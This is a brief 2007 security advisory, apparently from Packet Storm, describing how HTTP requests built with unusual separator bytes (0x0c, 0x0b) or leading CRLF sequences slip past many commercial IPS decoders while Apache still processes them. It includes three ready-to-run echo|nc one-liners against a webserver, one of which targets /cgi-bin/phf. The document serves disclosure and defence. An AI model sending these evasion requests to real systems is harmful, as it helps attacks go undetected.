ips-evasion.txt

2007-06-20T00:00:00
ID PACKETSTORM:57243
Type packetstorm
Reporter H D Moore
Modified 2007-06-20T00:00:00

Description

                                        
                                            `Summarized from https://strikecenter.bpointsys.com/  
  
Many commercial IPS products fail to decode HTTP requests which use 0x0c,   
0x0b, and 0x0d instead of the normal 0x20/0x09 separators. A request in   
the following format will evade most IPS protocol decoders:  
  
$ echo -ne "GET\x0c/cgi-bin/phf\x0cHTTP/1.0\r\n\r\n" | \  
nc webserver 80  
  
A request which contains multiple CRLF sequences instead of a valid method   
is processed by Apache, yet ignored by most IPS engines:  
  
$ echo -ne "\r\n\r\n\r\n\r\n\r\n /buggy.php HTTP/1.0\r\n\r\n" | \  
nc webserver 80  
  
The first issue was covered more than a year ago, yet most IPS vendors   
have failed to address it. The second issue is new, as far as I know. You   
can even combine them:  
  
$ echo -ne "\r\n\r\n\r\n\r\n\r\n\x0c/buggy.php\x0bHTTP/1.0\r\n\r\n" | \  
nc webserver 80  
  
-HD  
  
`